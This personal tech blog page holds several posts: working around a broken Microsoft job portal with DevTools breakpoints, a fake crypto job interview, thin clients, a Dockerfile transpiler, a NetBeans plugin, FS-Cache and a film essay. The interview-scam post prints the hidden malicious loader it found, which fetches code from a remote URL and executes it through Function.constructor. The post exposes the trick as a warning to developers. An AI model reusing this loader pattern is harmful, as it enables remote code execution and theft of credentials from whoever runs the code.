Monday, October 27, 2025

Debugging Microsoft's Job Portal

Or: When applying for a job becomes a technical interview you didn't sign up for

TL;DR: Microsoft's job portal had a bug that prevented me from submitting my application. After some browser console detective work, I discovered missing bearer tokens, set strategic JavaScript breakpoints, and manually set authentication headers to get my resume through. The irony of debugging Microsoft's code to apply to Microsoft was not lost on me.

I was excited to apply for a position at Microsoft. Their job portal has a nice feature: you can import your resume directly from LinkedIn rather than uploading a PDF. Convenient, right? I clicked the import button, watched my information populate, and confidently hit "Upload."

And waited. And waited.

Nothing happened. The button was stuck in a loading state, spinning endlessly.

As any developer would do when faced with a broken web app, I opened the browser's Network tab. There it was: a request to gcsservices.careers.microsoft.com that was failing. I examined the request headers and immediately spotted the problem: Authorization: Bearer undefined

Ah yes, the classic "undefined" bearer token. Someone's authentication flow was broken. The frontend was trying to make an authenticated request, but the token wasn't being set properly.

I started looking through other requests in the Network tab and found several that did have valid bearer tokens. I copied one of these working tokens for later use. Now I needed to figure out where in the code this broken request was being made.

I searched through the loaded JavaScript files and found the culprit in a minified file called main.0805accee680294efbb3.js. The code looked like this:

e && e.headers && (e.headers.Authorization = "Bearer " + await (0,
r.gf)(),
e.headers["X-CorrelationId"] = i.$.telemetry.sessionId,
e.headers["X-SubCorrelationId"] = (0,
s.A)(),
t(e))

This is where the bearer token was supposed to be added to the request headers. The r.gf function was clearly supposed to retrieve the token, but it was returning undefined.

I set a breakpoint on this line using Chrome DevTools. When the breakpoint hit, I manually set the bearer token in the console:

e.headers.Authorization = "Bearer " + "[my-valid-token]"

Then I let the execution continue. Success! The resume uploaded. Victory, right? Not quite.

After uploading the resume, I tried to click "Save and continue" to move to the next step. More failed requests.

Back to the Network tab. This time, I noticed requests failing to a different domain: careers.microsoft.com (without the "gcsservices" subdomain). These requests also had bearer token issues, but here's the twist: they needed a different bearer token than the first set of requests. Microsoft's job portal was apparently using two separate authentication systems.

I searched through the JavaScript again and found where XMLHttpRequest headers were being set:

const o = Ee.from(r.headers).normalize();

This was in a different part of the codebase handling a different set of API calls. I set another breakpoint here. Now I had a two-token juggling act: when requests went to gcsservices.careers.microsoft.com, I set Token A, and when requests went to careers.microsoft.com, I set Token B.

With both breakpoints set and both tokens ready, I went through the application flow one more time, manually adding the appropriate token at each breakpoint. After juggling between Token A for gcsservices requests and Token B for careers.microsoft.com requests, it finally worked. I made it through to the next page.


There's something deliciously ironic about having to debug Microsoft's production code just to submit a job application to Microsoft. Oh, and did I mention? I was doing all of this on a Chromebook Flex. 😄

This reminded me of last year when I wanted to buy a book from an online store. Their checkout form was broken and wouldn't let me proceed to payment. So I opened the browser console, found the validation bug in their JavaScript, bypassed it, and successfully placed my order. Apparently, fixing broken web forms has become my unexpected superpower.

To the Microsoft Hiring Team

If you're reading this:

  • Can I haz job?

Did I need to spend an hour debugging a job application portal? No. Was it more interesting than just uploading a PDF? Absolutely. And hey, if nothing else, I got a good blog post out of it.

Have you ever had to debug something just to accomplish a simple task? Share your stories in the comments!

Friday, October 17, 2025

Almost exploited via a job interview assignment

Days ago someone reached out on LinkedIn claiming to represent Koinos Finance's hiring team. Christian Muaña said they were impressed with my background and wanted me to move forward for a Senior Software Engineer position.

The technical interview email came from "Andrew Watson, Senior Engineering Engineer at Koinos" (hire @ koinos .finance) and seemed professional enough. Complete a 45-minute take-home coding assessment, push results to a public repository, share the link. Two business days. Standard tech interview stuff.

BitBucket and VMs

Andrew sent a BitBucket link to what looked like a typical full-stack React project. Frontend, backend with Express, routing, the usual. Nothing immediately suspicious.

I clicked the BitBucket link; probably not great opsec, but I do use BitBucket. Instead of cloning to my local machine though, I spun up a Google Cloud VM. Call it paranoia or good practice, but something made me want to keep this at arm's length (well, it is something crypto related).

Good thing too. I found the malicious code by manually reviewing the files. Never even ran npm install or built the project.

Middleware secrets

Buried in the backend middleware, specifically the cookie handling code, I found something concerning.

The code fetched data from a remote URL (base64 encoded) via mocki .io, then passed the response to what looked like an innocent "error handler" function. But this wasn't error handling: it used JavaScript's Function.constructor to execute whatever code the remote server returned.

const errorHandler = (error) => {

    const createHandler = (errCode) => {

        const handler = new (Function.constructor)('require', errCode);

        return handler;

    };

    const handlerFunc = createHandler(error);

     handlerFunc(require);

}

axios.get(atob(COOKIE_URL)).then(

    res => errorHandler(res.data.cookie)

  );

The moment I would have started the backend server, it would have downloaded and executed arbitrary code from an attacker-controlled server. Environment variables, API keys, credentials, sensitive files, backdoors.

A win for manual code review.

What made it work

The sophistication is what gets me. This wasn't some obvious phishing email with broken English. Professional LinkedIn outreach. Realistic assignment structure. Hosted on BitBucket, a trusted platform. Actual working React code with malicious payload hidden in middleware.

The malicious code used innocent function names like errorHandler and getCookie, tucked away in middleware where most developers wouldn't scrutinize carefully. Who thoroughly audits every line of a take-home assignment before running it?

It's targeted at developers who regularly download and run unfamiliar code as part of their job. That's the genius of it.

The obvious signs

Looking back, the red flags were there:

  • Salary range mentioned immediately.
  • Extreme flexibility: part-time acceptable, even with a current job.
  • "Senior Engineering Engineer" is redundant.
  • Two business days for a 45-minute assessment creates artificial urgency.

But the real red flag was in the code: base64-encoded URLs, remote code execution patterns, obfuscated logic in what should be straightforward middleware.

What this means

This is part of a growing trend of supply chain attacks targeting developers. We're attractive targets because we routinely download and execute code, have access to sensitive systems, and work with valuable intellectual property.

The sophistication is increasing. Not just phishing emails anymore; fully functional applications with malicious code carefully hidden where it might go unnoticed. Hosted on legitimate platforms like BitBucket for added credibility.

The thing is, the better these attacks get, the more they exploit the fundamental nature of development work. We clone repositories. We run npm install. We execute code. That's the job.

So what do you do? Review code before running it. Use isolated environments: VMs, Docker containers, cloud instances. Use Chromebooks for work! Watch for obfuscation. Be suspicious of too-good-to-be-true offers. Trust your instincts.

That nagging feeling that made me use a VM instead of my local machine was spot-on.

Your security is worth more than any job opportunity.

Thursday, October 09, 2025

The Modern Thin Client

For years, the developer community has been locked in a quiet arms race over who has the most powerful laptop. I’ve stepped off that treadmill. My setup is a modern take on the thin client, and it has made my workflow more focused, secure, and flexible.

At its heart, the principle is simple: use a lean local machine that runs only a browser, a terminal, and Visual Studio Code. The core of the work happens on a more powerful computer, which is often just another machine in my home office, accessible over the local network. I use the terminal to SSH into it, and VS Code's Remote Development to edit files directly on that remote machine. The local device becomes a high-fidelity window into a more powerful computer, and since it all runs over the intranet, my work continues uninterrupted even if the internet goes down.

This philosophy is portable. I have a Chromebook that I leave at my in-laws, perfectly set up for this. At home, my primary machine is an older MacBook Pro that runs only Chrome, Terminal, and VSCode. Both devices are just different gateways to the same powerful remote workspace.

This approach has the soul of an old-school UNIX workstation but with a modern editor. The terminal is the control center, but instead of a monochrome vi session, you get the full VSCode experience with all its extensions, running seamlessly on remote files.

A major benefit is the built-in security isolation. In a traditional setup, every script and dependency runs on the same machine as your primary browser with all its logged-in sessions. Here, there's a clear boundary: the local machine is for "trusted" tasks like browsing, while the remote machine is for "untrusted" work. A malicious script on the server cannot touch local browser data.

The most significant power, however, is the ability to scale. I've had situations where I needed parallel builds of separate branches for a resource-heavy project. A single machine couldn't handle two instances at once. With this setup, it was trivial: one VSCode window was connected to a powerful machine running the develop branch, and a second VSCode window was connected to an entirely different server running the feature branch. Each had its own dedicated resources, something impossible with a single laptop.

This model redefines the role of your laptop. It’s not about having a less capable machine, but about building a more capable and resilient system. The power is on the servers, and the local device is just a perfect, secure window into it.

Monday, October 06, 2025

Building a Dockerfile Transpiler

I'm excited to share dxform, a side project I've been working on while searching for my next role: a Dockerfile transpiler that can transform containers between different base systems and generate FreeBSD jail configurations.

The concept started simple: what if Dockerfiles could serve as a universal format for defining not just Docker containers, but other containerization systems too? Specifically, I wanted to see if I could use Dockerfiles—which developers already know and love—as the input format for FreeBSD jails.

I have some background building transpilers from a previous job, so I knew the general shape of the problem. But honestly, I expected this to be a much larger undertaking. Two things made it surprisingly manageable:

Dockerfiles are small. Unlike general-purpose programming languages, Dockerfiles have a limited instruction set (FROM, RUN, COPY, ENV, etc.). This meant the core transpiler could stay focused and relatively compact.

AI-assisted development works (mostly). This project became an experiment in how much I could orchestrate AI versus writing code myself. I've been using AI tools so heavily I'm hitting weekly limits. The feedback has been fascinating: AI is surprisingly good at some tasks but still needs human architectural decisions. It's an odd mix where it gets things right and wrong in unexpected places.

Here's where complexity crept in: the biggest challenge wasn't the Dockerfile instructions themselves—it was parsing the shell commands inside RUN instructions.

When you write:

RUN apt-get update && apt-get install -y curl build-essential

The transpiler needs to understand that apt-get install command deeply enough to transform it to:

RUN apk update && apk add curl build-base

This meant building a shell command parser on top of the Dockerfile parser. I used mvdan.cc/sh for this, and it works beautifully for the subset of shell commands that appear in Dockerfiles.

dxform can currently transform between base systems (convert Debian/Ubuntu containers to Alpine and vice versa), translate package managers (automatically mapping ~70 common packages between apt and apk), and preserve your comments and structure.

The most interesting part is the FreeBSD target. The tool has two outputs: --target freebsd-build creates a shell script that sets up ZFS datasets and runs the build commands, while --target freebsd-jail emits the jail configuration itself. Together, these let you take a standard Dockerfile and deploy it to FreeBSD's native containerization system.

dxform transform --target freebsd-build Dockerfile > build.sh

dxform transform --target freebsd-jail Dockerfile > jail.conf

It's early days, but the potential is there: Dockerfiles as a universal container definition format, deployable to Docker or FreeBSD jails.

This is very much an experiment and a learning experience. The package mappings could be more comprehensive, the FreeBSD emitter could be more sophisticated, and there are surely edge cases I haven't encountered yet. But it works, and it demonstrates something compelling: with the right abstractions, we can build bridges between different containerization ecosystems.

The project is open source and ready for experimentation. Whether you're interested in cross-platform containers, FreeBSD jails, or the mechanics of building transpilers for domain-specific languages, I'd love to hear your thoughts.

Check out the project on GitHub to see the full source and try it yourself.

Monday, September 29, 2025

Building a Claude Code Plugin for NetBeans: An Early Look

I've started working on a personal project to integrate Claude Code directly into the NetBeans IDE. It's still in the early stages, but there's enough progress to share a look at how it's taking shape.

As someone who contributed to NetBeans in the past (starting with Sun Microsystem days, up to the early Apache Software Foundation years and with my old OpenBeans distribution), it's interesting to be tinkering with the platform again in this new context of AI-assisted development.

Current Progress

The basic integration is working. The plugin can now:

  • Respond to most tool calls
  • Track and send your current code selection, updating Claude when you change it

This provides the foundation for contextual conversations about your code. Most of the core MCP (Model Context Protocol) tools are implemented, allowing Claude to interact meaningfully with the project workspace.

Interestingly, I'm building much of this with Claude Code itself. While I handle the architecture and inevitably fix things when they go off track, it's been a practical test of using the tool to build its own integration.

Current Focus: Refining the Integration

Right now, I'm focused on the finer details of the MCP protocol implementation. The public documentation covers the concepts well, but getting all the JSON schemas precisely right for a robust integration requires some careful attention.

What makes this particularly interesting is that unlike many modern protocols, Claude Code's MCP flavour isn't fully open—and neither are the official plugins for editors like VSCode and IntelliJ.

To help with development, I created a WebSocket proxy library—ironically, with Claude's help—which has been useful for observing the data flow and debugging the communication layer.

Looking Ahead

This remains a side project, driven by personal interest in both NetBeans and AI tooling. The goal for now is to create a solid, functional plugin that I'd be comfortable using.

If you're a NetBeans user curious about AI-assisted coding, I'd be interested in your thoughts. What would make a tool like this most useful in your workflow? I'm continuing development and will share updates as there's more to show.

If you're curious about the code or want to follow along, the project is on GitHub.

Friday, September 26, 2025

Scaling AI Workloads: Using Linux FS-Cache to Serve Giant Models from Network Storage

Working with multi-gigabyte LLM and diffusion model files presents a practical challenge: local storage is fast but limited, while network storage is capacious but slow. This is especially true for compact workstations like a Mac Mini or a laptop with a small SSD, where fitting several large models is impossible.

What if you could get the best of both worlds—the speed of local storage for active models and the limitless capacity of a network share? Instead of copying files back and forth, we can use a transparent caching layer built right into the Linux kernel.

The Bottleneck: Network Latency vs. Model Size

The standard approach of mounting a network drive (NFS or Samba/CIFS) containing your model repository solves the storage problem but introduces a performance penalty. Loading a 10GB model over a network, even a fast one, can cause significant delays. This slows down experimentation, hinders rapid model switching, and creates a frustrating development cycle.

The solution isn't to fight the network but to smartly use local storage as a massive read-cache for the remote filesystem. Enter FS-Cache.

FS-Cache: The Hidden Gem for Accelerating Network Filesystems

Linux has long included a powerful, filesystem-agnostic caching layer called FS-Cache. Originally designed for environments like NFS, its utility for AI workloads is profound. The concept is simple:

  1. The first time a model file is read from the network, it is silently stored in a designated cache on a local disk (ideally an SSD).
  2. Every subsequent read for that file is served directly from the local cache at drive speeds, bypassing the network entirely.

This means the second time you load "llama2-7b.Q4.gguf," it feels instantaneous.

Implementation: A Two-Step Setup

The beauty of this system is that it requires no changes to your applications. PyTorch, TensorFlow, or any other tool that reads files will transparently benefit.

Step 1: Configure the cachefilesd Daemon

The kernel provides the caching engine, but you need a userspace manager for the cache directory. This is handled by cachefilesd.

  1. Install it: sudo apt install cachefilesd (on Debian/Ubuntu).
  2. Edit /etc/cachefilesd.conf to point dir to a directory on your fast local drive (e.g., dir /var/cache/fscache). Ensure it has enough space for your active set of models.
  3. Start and enable the daemon: sudo systemctl enable --now cachefilesd.

Step 2: Mount the Network Share with the fsc Flag

Now, mount your network share containing the models with the special fsc (filesystem cache) option.

For a CIFS/Samba share:

sudo mount -t cifs //ai-server/models /mnt/models -o username=user,password=pass,fsc

For an NFS share:

sudo mount -t nfs ai-server:/models /mnt/models -o fsc

That's it. Any file read from /mnt/models is now eligible for caching.

Pro Tip: Pre-Warming the Cache for Instant Results

While the cache populates naturally during use, you can pre-load specific models to eliminate the first-load penalty entirely. This is perfect for preparing a model before a demo or a critical training run.

Simply read the file through the mount point:

cat /mnt/models/llama2-7b.Q4.gguf > /dev/null

This command will pull the entire model file through the kernel's FS-Cache layer, populating the local disk cache. The next time your Python script opens that file, it will be read from the local SSD at full speed.

Conclusion

Using FS-Cache transforms your workflow. It allows a small, fast local disk to act as a high-speed front-end to a vast, centralized model repository on a network server. This setup is not just for media files; it's a pragmatic and powerful solution for managing the growing size of AI artifacts, making it easier to scale your development environment without upgrading every machine's storage.

Tuesday, June 14, 2022

The Trouble with Harry time loop

I saw The Trouble with Harry (1955) a while back and it didn't have a big impression on me. But recently I rewatched it and was amazed at how odd time seems to flow, how somewhat confused people are, as if they have memory problems.

This review goes into detail about the movie, but I wanted to focus on a single riddle in the movie. It's this exchange with the kid:

Arnie: Why haven't you visited before?
Sam: Perhaps I'll come back tomorrow
Arnie: When's that?
Sam: Day after today.
Arnie: That's yesterday, today is tomorrow.
Sam: It was.
Arnie: When was tomorrow yesterday, Mr. Marlowe?
Sam: Today.
Arnie: Oh, sure. Yesterday.

Arnie seems to be the only one that remembers reliving days. Every adult just has slight confusion at times; forgetting things or having unexplained familiarity with each other.

We learn from this exchange the loop is not identical (Sam never visited before). But time does not flow properly since Arnie has learned not to expect that tomorrow will just come the next day ("When's that?").

Actually, Arnie knows that the day after the present day is... "yesterday"; the loop restarts. If anything it looks like the present day is something entirely new to Arnie. It's finally a "tomorrow".

My impression is that the loop had a single day until now. It was "yesterday" on a loop. The present day is finally a "tomorrow".

Sam and Arnie obviously talk about things from different perspectives. Maybe Sam has a slight intuition about things (being an artist) but only Arnie knows about the loop. So, it's not clear what Sam means when he says "It was".

Anyway, this puzzles Arnie which asks "When was tomorrow yesterday, Mr. Marlowe?"

Now, Sam answers "Today". This may just be related to the talk they had: Arnie mentioned that the day after today is yesterday so, today is the day when yesterday will come tomorrow.

But then Arnie thinks about the question he just asked and finds his own answer: in the previous loop of yesterday tomorrow was always yesterday.

It almost looks like the timeline was: Yesterday1, Yesterday2, ..., Yesterday N, Today (brand new).

Based on the ending we know the adults intently do a time loop: leave Harry in the forest for Arnie to find again. The mother even says: "Go on, Arnie, run home and tell me about it" and Miss Ivy Gravely repeats "Please Arnie, run home and tell your mother".

So, the timeline is: Yesterday 1, Yesterday2, ..., Yesterday N, Today1, Today 2 (new loop).

It does not look to me that time is going in reverse. It looks to me like there's a daily loop that doesn't progress until things are settled.

Going back to the missing piece: Sam says "it was" suggesting today was tomorrow. Assuming this is the 1st day in the new loop, it does make sense indeed: today was yesterday's tomorrow, but since they are entering another loop there will not be another new day, just today on repeat.

The riddle is interesting because of there's no language to express time loops properly. "Tomorrow" may mean the day following the present day which may be a re-run or loop or "tomorrow" may be the day naturally following current events. A more proper (but dry) phrasing would be:

Arnie: Why haven't you visited in any of the (repeated) days I remember?
Sam: Perhaps I'll come back tomorrow.
Arnie: When will we get to live tomorrow?
Sam: Day after today.
Arnie: After today we will relive yesterday, today is a new day following the yesterday loop.
Sam: But the next day won't be new.
Arnie: When did we live the day before yesterday, Mr. Marlowe?
Sam: [Nonsensical response.]
Arnie: [Gets confused.] Oh, sure. We continuously relived yesterday.

Debugging Microsoft's Job Portal

Or: When applying for a job becomes a technical interview you didn't sign up for TL;DR: Microsoft's job portal had a bug that prev...